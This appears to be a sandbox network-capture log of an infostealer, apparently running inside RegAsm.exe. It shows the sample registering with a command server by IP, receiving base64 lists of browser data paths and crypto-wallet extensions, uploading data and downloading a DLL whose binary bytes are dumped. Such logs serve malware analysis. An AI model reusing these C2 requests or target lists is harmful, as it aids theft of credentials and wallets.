2024-09-26 23:37:34 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:37:34 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 23:37:34 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 23:37:34 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49711	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:35 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49712	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:37 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:37 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 30 39 31 36 34 37 42 34 42 43 34 31 35 38 31 33 35 32 33 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="hwid"CA091647B4BC4158135236-a33c7340-61ca------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------AEHIDAKECFIEBGDHJEBK--
2024-09-26 23:37:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:38 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|daf713146d0a898a2b2cd4e8ba23288f\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:39 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:39 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------AAFBAKECAEGCBFIEGDGICont
2024-09-26 23:37:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:39 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:41 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:41 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------DHCAECGIEBKJKEBGDHDACont
2024-09-26 23:37:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:42 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:42 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:42 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------CBKFIECBGDHJKECAKFBGCont
2024-09-26 23:37:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:43 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49716	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:44 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6353 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:44 UTC	6353	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------GIJDGCAEBFIIECAKFHIJCont
2024-09-26 23:37:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49717	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:45 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:45 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:45 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:37:45 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
